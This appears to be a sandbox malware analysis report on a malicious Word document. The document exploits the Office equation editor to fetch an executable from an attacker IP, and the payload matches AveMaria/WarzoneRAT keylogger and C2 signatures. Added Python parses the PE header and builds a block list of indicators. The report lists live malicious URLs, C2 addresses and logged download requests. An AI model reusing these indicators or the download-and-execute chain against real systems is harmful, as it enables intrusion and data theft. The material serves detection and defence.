00 10 00 00 00 a0 00 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 50 24 00 00 04 00 00 00 00 00 00 02 00 40 81 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e0 c6 00 00 a8 00 00 00 88 c7 00 00 2c 01 00 00 00 b0 21 00 d0 88 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 24 00 00 0d 00 00 20 ad 00 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 9c ad 00 00 18 00 00 00 40 ad 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 a0 00 00 54 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 8c 8a 00 00 00 10 00 00 00 8c 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 e6 34 00 00 00 a0 00 00 00 36 00 00 00 90 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 18 a0 20 00 00 e0 00 00 00 9c 20 00 00 c6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 67 66 69 64 73 00 00 60 00 00 00 00 90 21 00 00 02 00 00 00 62 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 74 6c 73 00 00 00 00 09 00 00 00 00 a0 21 00 00 02 00 00 00 64 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 73 72 63 00 00 00 d0 88 02 00 00 b0 21 00 00 8a 02 00 00 66 21 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 00 0d 00 00 00 40 24 00 00 0e 00 00 00 f0 23 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 (followed by a run of 00 bytes, the header padding up to SizeOfHeaders 0x400; the dump is cut off in the report)
            The dumped body decodes as a PE32 executable: IMAGE_FILE_MACHINE_I386, 7 sections, TimeDateStamp 0x62ec182a (2022-08-04 19:04:10 UTC, a few hours before the server's Last-Modified), AddressOfEntryPoint 0x8d3a, ImageBase 0x400000, GUI subsystem, DllCharacteristics 0x8140 (DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE). Sections: .text, .rdata, .data (VirtualSize 0x20a018, about 90% of the file), .gfids, .tls, .rsrc, .reloc. The last section's raw data ends at file offset 0x23fe00 = 2358784, which equals Content-Length and the size component of the ETag, so the sandbox received the whole file and it carries no overlay.
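The HTTP response above is only labelled application/octet-stream; whether the 2,358,784-byte body is really a Windows executable, and whether the sandbox received all of it, can be read off the dumped header bytes. The Python below is an added example written for this page, not part of the Joe Sandbox report or of any tool it names. Its input is constructed from the report's hex dump: the DOS header and everything from the PE signature through the section table are copied verbatim, while the DOS stub and Rich header, which the parser never reads, are replaced by zero padding. The ETag check assumes the size-mtime layout that this Apache ETag visibly uses.

```python
import struct
from datetime import datetime, timezone

# Constructed input (assembled for this example, not sandbox output): the response body's
# first 0x318 bytes as shown in the report's hex dump. The 64-byte DOS header and everything
# from the "PE\0\0" signature at e_lfanew = 0x108 through the seven section headers are
# verbatim; the DOS stub and Rich header in between (0x40-0x107) are zero padding here.
DOS_HEADER = bytes.fromhex(
    "4d5a90000300000004000000ffff0000"
    "b8000000000000004000000000000000"
    "00000000000000000000000000000000"
    "00000000000000000000000008010000"  # e_lfanew = 0x108
)
NT_HEADERS = bytes.fromhex(
    # "PE\0\0", Machine 0x14c, NumberOfSections 7, TimeDateStamp, symbol ptr/count,
    # SizeOfOptionalHeader 0xe0, Characteristics 0x102
    "50450000" "4c01" "0700" "2a18ec62" "00000000" "00000000" "e000" "0201"
    # PE32 magic 0x10b, linker 14.0, SizeOfCode, SizeOfInitializedData, SizeOfUninitializedData,
    # AddressOfEntryPoint 0x8d3a, BaseOfCode, BaseOfData, ImageBase 0x400000
    "0b01" "0e00" "008c0000" "006e2300" "00000000" "3a8d0000" "00100000" "00a00000" "00004000"
    # SectionAlignment, FileAlignment, OS/image/subsystem versions, Win32VersionValue,
    # SizeOfImage 0x245000, SizeOfHeaders 0x400
    "00100000" "00020000" "0500" "0100" "0000" "0000" "0500" "0100" "00000000" "00502400" "00040000"
    # CheckSum, Subsystem 2 (GUI), DllCharacteristics 0x8140, stack/heap reserve+commit,
    # LoaderFlags, NumberOfRvaAndSizes 16
    "00000000" "0200" "4081" "00001000" "00100000" "00001000" "00100000" "00000000" "10000000"
    # data directories as (RVA, Size): export, import, resource, exception,
    "e0c60000a8000000" "88c700002c010000" "00b02100d0880200" "0000000000000000"
    # security, base relocation, debug, architecture,
    "0000000000000000" "00402400000d0000" "20ad00001c000000" "0000000000000000"
    # global ptr, TLS, load config, bound import,
    "0000000000000000" "9cad000018000000" "40ad000040000000" "0000000000000000"
    # IAT, delay import, CLR, reserved
    "00a0000054020000" "0000000000000000" "0000000000000000" "0000000000000000"
)
SECTION_TABLE = bytes.fromhex(
    # Name               VirtSize   VirtAddr   RawSize    RawPtr     reloc/linenum ptrs+counts  Characteristics
    "2e74657874000000" "8c8a0000" "00100000" "008c0000" "00040000" "000000000000000000000000" "20000060"  # .text
    "2e72646174610000" "e6340000" "00a00000" "00360000" "00900000" "000000000000000000000000" "40000040"  # .rdata
    "2e64617461000000" "18a02000" "00e00000" "009c2000" "00c60000" "000000000000000000000000" "400000c0"  # .data
    "2e67666964730000" "60000000" "00902100" "00020000" "00622100" "000000000000000000000000" "40000040"  # .gfids
    "2e746c7300000000" "09000000" "00a02100" "00020000" "00642100" "000000000000000000000000" "400000c0"  # .tls
    "2e72737263000000" "d0880200" "00b02100" "008a0200" "00662100" "000000000000000000000000" "40000040"  # .rsrc
    "2e72656c6f630000" "000d0000" "00402400" "000e0000" "00f02300" "000000000000000000000000" "42000040"  # .reloc
)
RESPONSE_HEAD = DOS_HEADER + bytes(0x108 - 0x40) + NT_HEADERS + SECTION_TABLE

# Values taken from the HTTP response headers in the report.
REPORT_CONTENT_LENGTH = 2358784
REPORT_ETAG = '"23fe00-5e573221f770a"'

SECTION_HDR = "<8sIIIIIIHHI"  # IMAGE_SECTION_HEADER, 40 bytes


def parse_pe_headers(data: bytes) -> dict:
    """Parse the DOS header, IMAGE_FILE_HEADER, PE32 optional header and section table.
    Raises ValueError when the blob is not a PE32 image, the first thing to establish when
    a server labels a download application/octet-stream."""
    if data[:2] != b"MZ":
        raise ValueError("no MZ signature: body is not a PE image")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature at e_lfanew")
    machine, nsections, timestamp, _, _, opt_size, _ = struct.unpack_from("<HHIIIHH", data, e_lfanew + 4)
    opt = e_lfanew + 24
    if struct.unpack_from("<H", data, opt)[0] != 0x10B:
        raise ValueError("only PE32 optional headers are handled here")
    entry_point = struct.unpack_from("<I", data, opt + 16)[0]
    image_base = struct.unpack_from("<I", data, opt + 28)[0]
    subsystem, dll_chars = struct.unpack_from("<HH", data, opt + 68)
    sections = []
    for i in range(nsections):
        name, vsize, va, raw_size, raw_ptr, _, _, _, _, chars = struct.unpack_from(
            SECTION_HDR, data, opt + opt_size + i * struct.calcsize(SECTION_HDR))
        sections.append({"name": name.rstrip(b"\0").decode("ascii", "replace"),
                         "virtual_size": vsize, "virtual_address": va,
                         "raw_size": raw_size, "raw_pointer": raw_ptr, "characteristics": chars})
    return {
        "machine": machine, "num_sections": nsections, "timestamp": timestamp,
        "compile_time_utc": datetime.fromtimestamp(timestamp, tz=timezone.utc).strftime("%Y-%m-%d %H:%M:%S"),
        "entry_point": entry_point, "image_base": image_base,
        "subsystem": subsystem, "dll_characteristics": dll_chars, "sections": sections,
        # Where the last section's raw data ends: a file without an overlay is exactly this long.
        "expected_file_size": max((s["raw_pointer"] + s["raw_size"] for s in sections), default=0),
    }


def cross_check_with_http(info: dict, content_length: int, etag: str) -> dict:
    """Compare the size implied by the section table with what the HTTP layer reported.
    Assumes an Apache size-mtime ETag, whose first component is the file size in hex."""
    expected = info["expected_file_size"]
    etag_size = int(etag.strip('"').split("-")[0], 16)
    largest = max(info["sections"], key=lambda s: s["virtual_size"])
    return {
        "content_length_matches": content_length == expected,
        "etag_size_matches": etag_size == expected,
        "overlay_bytes": content_length - expected,
        # One data section holding most of the file is the usual shape of an embedded payload.
        "largest_section": largest["name"],
        "largest_section_fraction": largest["virtual_size"] / content_length,
    }


if __name__ == "__main__":
    info = parse_pe_headers(RESPONSE_HEAD)
    print(info["compile_time_utc"], [s["name"] for s in info["sections"]])
    print(cross_check_with_http(info, REPORT_CONTENT_LENGTH, REPORT_ETAG))
```

Run stand-alone it prints the compile timestamp and section list and reports that the last section ends exactly at Content-Length, so the download completed and carries no overlay; .data alone accounts for about 90% of the file, the usual shape of a loader that carries its payload as initialized data. Replacing RESPONSE_HEAD with the first 0x400 bytes of any captured download reuses the check.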
            Source: global trafficHTTP traffic detected: GET /fifthikmerozx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 208.67.105.179Connection: Keep-Alive
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009A27D3 URLDownloadToFileW,ShellExecuteW,
            Source: Joe Sandbox ViewASN Name: QUONIXNETUS QUONIXNETUS
            Source: Joe Sandbox ViewASN Name: GRAYSON-COLLIN-COMMUNICATIONSUS GRAYSON-COLLIN-COMMUNICATIONSUS
            Source: Joe Sandbox ViewIP Address: 76.8.53.133 76.8.53.133
            Source: Joe Sandbox ViewIP Address: 208.67.105.179 208.67.105.179
            Source: global trafficTCP traffic: 192.168.2.22:49179 -> 76.8.53.133:1198
            Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.910363521.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.67.105.179/fifthikmerozx.exe
            Source: EQNEDT32.EXE, 00000002.00000002.910363521.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.67.105.179/fifthikmerozx.exe.
            Source: EQNEDT32.EXE, 00000002.00000002.910363521.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.67.105.179/fifthikmerozx.exej
            Source: EQNEDT32.EXE, 00000002.00000002.910363521.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.67.105.179/fifthikmerozx.exelateC:
            Source: EQNEDT32.EXE, 00000002.00000002.910363521.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.67.105.179/fifthikmerozx.exerrC:
            Source: powershell.exe, 00000006.00000002.988213966.0000000000502000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.co
            Source: powershell.exe, 00000006.00000003.984768254.00000000004BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
            Source: powershell.exe, 00000006.00000003.984768254.00000000004BB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
            Source: fiftikmernk852317.exeString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeper
            Source: fiftikmernk852317.exe, 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, fiftikmernk852317.exe, 00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, fiftikmernk852317.exe, 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, fiftikmernk852317.exe, 00000005.00000003.980132553.00000000004DF000.00000004.00000020.00020000.00000000.sdmp, fiftikmernk852317.exe, 00000005.00000003.979955423.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, fiftikmernk852317.exe, 00000005.00000002.1180424961.00000000009B4000.00000002.00001000.00020000.00000000.sdmpString found in binary or memory: https://github.com/syohex/java-simple-mine-sweeperC:
            Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{2B64019E-B848-4D54-A6DE-401B40718F4D}.tmpJump to behavior
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009AD0A3 recv,
            Source: global trafficHTTP traffic detected: GET /fifthikmerozx.exe HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 208.67.105.179Connection: Keep-Alive
            Source: unknownTCP traffic detected without corresponding DNS query: 208.67.105.179 (this entry appears 50 times in the report)
            Source: EQNEDT32.EXE, 00000002.00000002.910363521.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: /moc.nideknil.wwwwww.linkedin.com9 equals www.linkedin.com (Linkedin)
            Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000002.00000002.910363521.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: www.linkedin.com equals www.linkedin.com (Linkedin)
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009A89D5 GetAsyncKeyState,wsprintfW,GetAsyncKeyState,wsprintfW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetKeyNameTextW,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,CallNextHookEx,
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009A902E DefWindowProcA,GetRawInputData,GetRawInputData,GetForegroundWindow,GetWindowTextW,lstrlenW,lstrcpyW,CreateFileW,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,lstrlenW,WriteFile,CloseHandle,PostQuitMessage,RegisterRawInputDevices,
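The rows in this network section give everything needed to turn the report into detections and block-list entries: a C2 address from the malware configuration, a download from an IP literal that no DNS query preceded, and that URL sitting in the memory of EQNEDT32.EXE, a process that has no business on the network. The Python below is an added example, not part of the Joe Sandbox report; it runs over constructed copies of those rows (with the column break between the Source field and the row text restored as a space) and derives findings and a block list from them. The regular expressions and the OFFICE_HELPERS set are this example's own assumptions, not Joe Sandbox fields.

```python
import ipaddress
import re

# Constructed sample: copies of network rows from this report, with a space restored between the
# "Source" column and the row text. The attribution of the download URL to EQNEDT32.EXE follows
# the report's own rows and its "EQNEDT32.EXE connecting to internet" signature.
REPORT_ROWS = [
    "Source: Malware configuration extractor URLs: 76.8.53.133",
    "Source: global traffic HTTP traffic detected: GET /fifthikmerozx.exe HTTP/1.1 Accept: */* "
    "User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0) "
    "Host: 208.67.105.179 Connection: Keep-Alive",
    "Source: global traffic TCP traffic: 192.168.2.22:49179 -> 76.8.53.133:1198",
    "Source: unknown TCP traffic detected without corresponding DNS query: 208.67.105.179",
    "Source: EQNEDT32.EXE, 00000002.00000002.910363521.000000000067F000.00000004.00000020.00020000.00000000.sdmp "
    "String found in binary or memory: http://208.67.105.179/fifthikmerozx.exe",
    "Source: C:\\Users\\user\\AppData\\Roaming\\fiftikmernk852317.exe Code function: 5_2_009A27D3 "
    "URLDownloadToFileW,ShellExecuteW,",
]

# Office components that should never reach the network themselves (assumed list for this example).
# EQNEDT32.EXE doing so is the tell for the equation-editor exploit chain the report attributes
# to CVE-2017-11882 / CVE-2018-0802.
OFFICE_HELPERS = {"eqnedt32.exe", "winword.exe", "excel.exe", "powerpnt.exe"}

RX_CONFIG_C2 = re.compile(r"Malware configuration extractor\s*URLs?:\s*(\S+)")
RX_TCP = re.compile(r"TCP traffic:\s*[\d.]+:\d+\s*->\s*([\d.]+):(\d+)")
RX_HTTP = re.compile(r"HTTP traffic detected:\s*(GET|POST)\s+(\S+)\s+HTTP/1\.[01].*?Host:\s*(\S+?)(?=Connection:|\s|$)")
RX_NO_DNS = re.compile(r"without corresponding DNS query:\s*([\d.]+)")
RX_STRING_URL = re.compile(r"Source:\s*([^,\s]+\.(?:exe|EXE)).*?String found in binary or memory:\s*(https?://\S+)")
RX_DL_EXEC = re.compile(r"Source:\s*(\S+\.exe).*?Code function:.*?URLDownloadToFileW.*?ShellExecuteW")


def is_ip_literal(host: str) -> bool:
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def extract_iocs(rows) -> dict:
    """Pull C2 addresses, observed sockets, fetched URLs, DNS-less destinations, which process held
    each URL in memory, and which dropped binary does download-and-execute."""
    iocs = {"config_c2": set(), "tcp_dst": set(), "http_urls": set(),
            "no_dns_ips": set(), "url_holders": {}, "download_exec": set()}
    for row in rows:
        if m := RX_CONFIG_C2.search(row):
            iocs["config_c2"].add(m.group(1))
        if m := RX_TCP.search(row):
            iocs["tcp_dst"].add((m.group(1), int(m.group(2))))
        if m := RX_HTTP.search(row):
            iocs["http_urls"].add(f"http://{m.group(3)}{m.group(2)}")
        if m := RX_NO_DNS.search(row):
            iocs["no_dns_ips"].add(m.group(1))
        if m := RX_STRING_URL.search(row):
            iocs["url_holders"].setdefault(m.group(2), set()).add(m.group(1).lower())
        if m := RX_DL_EXEC.search(row):
            iocs["download_exec"].add(m.group(1).rsplit("\\", 1)[-1].lower())
    return iocs


def findings(iocs) -> list:
    """Cross-reference the IOC sets the way an analyst would before writing detections."""
    out = []
    for url in sorted(iocs["http_urls"]):
        host = re.match(r"https?://([^/:]+)", url).group(1)
        if is_ip_literal(host) and host in iocs["no_dns_ips"]:
            out.append(f"direct-IP download, no DNS lookup: {url}")
        # Only trust a memory string that matches a URL actually seen on the wire.
        for proc in sorted(iocs["url_holders"].get(url, ())):
            if proc in OFFICE_HELPERS:
                out.append(f"Office helper {proc} holds the download URL {url}: equation-editor exploit chain")
    for ip in sorted(iocs["config_c2"]):
        for dst, port in sorted(iocs["tcp_dst"]):
            if dst == ip:
                out.append(f"config C2 {ip} confirmed by a live TCP connection on port {port}")
    for proc in sorted(iocs["download_exec"]):
        out.append(f"{proc} calls URLDownloadToFileW then ShellExecuteW (download-and-execute)")
    return out


def blocklist(iocs) -> dict:
    """Flatten everything into block-list form: IPs, ip:port sockets and URLs."""
    ips = set(iocs["config_c2"]) | set(iocs["no_dns_ips"]) | {ip for ip, _ in iocs["tcp_dst"]}
    urls = iocs["http_urls"] | set(iocs["url_holders"])
    for url in urls:
        host = re.match(r"https?://([^/:]+)", url).group(1)
        if is_ip_literal(host):
            ips.add(host)
    return {"ips": sorted(ips, key=ipaddress.ip_address),
            "sockets": sorted(f"{ip}:{port}" for ip, port in iocs["tcp_dst"]),
            "urls": sorted(urls)}


if __name__ == "__main__":
    extracted = extract_iocs(REPORT_ROWS)
    for line in findings(extracted):
        print(line)
    print(blocklist(extracted))
```

Several rows of the report carry the same URL with trailing memory junk (exej, exelateC:, exerrC:), so findings() only reports holders of a URL that was also seen on the wire rather than trusting the string alone; on the real rows, feed the fused text as-is, since the patterns tolerate the missing space after the Source column.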

            E-Banking Fraud

            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.980132553.00000000004DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000003.979955423.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000005.00000002.1180424961.00000000009B4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORY

            System Summary

            Source: initial sampleStatic file information: Filename: New Order ( MY 01-22-DTHI .doc
            Source: New Order ( MY 01-22-DTHI .doc, type: SAMPLEMatched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
            Source: 5.3.fiftikmernk852317.exe.4ce9f8.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 5.2.fiftikmernk852317.exe.24389af.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 5.3.fiftikmernk852317.exe.4cff90.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 5.3.fiftikmernk852317.exe.4cd188.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 5.2.fiftikmernk852317.exe.242053f.4.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 5.2.fiftikmernk852317.exe.9a0000.0.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Codoso APT Gh0st Malware Author: Florian Roth
            Source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects Encrial credential stealer malware Author: Florian Roth
            Source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects executables embedding command execution via IExecuteCommand COM object Author: ditekSHen
            Source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPEMatched rule: Detects AveMaria/WarzoneRAT Author: ditekSHen
            Source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 5.2.fiftikmernk852317.exe.242053f.4.raw.unpack, type: UNPACKEDPEMatched rule: AveMaria_WarZone Author: unknown
            Source: 00000005.00000003.980052176.00000000004DB000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 00000005.00000003.979964184.00000000004D5000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 00000005.00000003.980132553.00000000004DF000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 00000005.00000003.979955423.00000000004CE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 00000005.00000002.1180934477.0000000002420000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: 00000005.00000002.1180424961.00000000009B4000.00000002.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_AveMaria_31d2bce9 Author: unknown
            Source: Screenshot number: 4Screenshot OCR: enable editing to open in readable fomat??7!?:|"$]?79#3~[|n,"3++:&'^?9?1?,0* !^+[72"!(98,?1'47;
            Source: Screenshot number: 8Screenshot OCR: enable editing to operi inmddbl' i / 1/ [ fcKulat??7r'1$]??t9#3~[|j?>"3++:&"?9?l?,0'k"+[72"!(98 ?
            Source: Screenshot number: 12Screenshot OCR: enable editing to open in readable fomat'??7!?:|"$]?T.%3~[|-|'?-,"3H:&'^?12,0*!^+[72"!(98,?1'47;:
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\fifthikmerozx[1].exeJump to dropped file
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeJump to dropped file
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_00DD6C40
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_009B1BF8
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeCode function: 5_2_02431537
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_01FC1F22
            Source: ~WRF{F633E147-4322-4DEF-8D52-47EC935B75D3}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
            Source: fifthikmerozx[1].exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: fiftikmernk852317.exe.2.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77620000 page execute and read and write
            Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEMemory allocated: 77740000 page execute and read and write
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeMemory allocated: 77620000 page execute and read and write
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeMemory allocated: 77740000 page execute and read and write
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeMemory allocated: 77620000 page execute and read and write
            Source: C:\Users\user\AppData\Roaming\fiftikmernk852317.exeMemory allocated: 77740000 page execute and read and write
            Source: New Order ( MY 01-22-DTHI .doc, type: SAMPLEMatched rule: INDICATOR_RTF_MalVer_Objects author = ditekSHen, description = Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents.
            Source: 5.3.fiftikmernk852317.exe.4ce9f8.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 5.3.fiftikmernk852317.exe.4ce9f8.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_1 date = 2016-01-30, hash3 = d7004910a87c90ade7e5ff6169f2b866ece667d2feebed6f0ec856fb838d2297, hash2 = 7dc7cec2c3f7e56499175691f64060ebd955813002d4db780e68a8f6e7d0a8f8, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, super_rule = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
            Source: 5.2.fiftikmernk852317.exe.24389af.3.raw.unpack, type: UNPACKEDPEMatched rule: Codoso_Gh0st_2 date = 2016-01-30, author = Florian Roth, description = Detects Codoso APT Gh0st Malware, reference = https://www.proofpoint.com/us/exploring-bergard-old-malware-new-tricks, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE, hash = 5402c785037614d09ad41e41e11093635455b53afd55aa054a09a84274725841
